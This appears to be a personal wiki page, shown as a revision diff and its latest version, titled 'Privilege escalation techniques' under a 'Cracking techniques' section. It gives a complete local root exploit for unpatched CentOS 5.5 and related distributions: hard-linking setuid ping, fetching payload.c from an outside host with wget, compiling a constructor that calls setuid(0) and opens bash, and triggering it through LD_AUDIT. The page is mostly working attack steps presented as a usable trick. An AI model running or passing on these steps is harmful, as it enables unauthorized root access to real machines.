Difference between revisions of "Privilege escalation techniques"

From Notes_Wiki
(Created page with "=Privilege escalation techniques= ==Trick 1== This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after Oc...")
 
m
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
=Privilege escalation techniques=
[[Main Page|Home]] > [[Cracking techniques]] > [[Privilege escalation techniques]]


==Trick 1==
==Trick 1==
Line 20: Line 20:
#gcc -w -fPIC -shared -o /tmp/exploit payload.c
#gcc -w -fPIC -shared -o /tmp/exploit payload.c
#LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
#LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[[Main Page|Home]] > [[Cracking techniques]] > [[Privilege escalation techniques]]

Latest revision as of 04:23, 18 April 2022

Home > Cracking techniques > Privilege escalation techniques

Trick 1

This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after October 2010 seem to be safe against this attack. This also works on Fedora / RHEL type of distributions.

  1. mkdir /tmp/exploit
  2. ln /bin/ping /tmp/exploit/target
  3. exec 3< /tmp/exploit/target
  4. rm -rf /tmp/exploit/
  5. wget pistol.clan.su/payload.c
  6. The payload.c file contains
    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
  7. gcc -w -fPIC -shared -o /tmp/exploit payload.c
  8. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3


Home > Cracking techniques > Privilege escalation techniques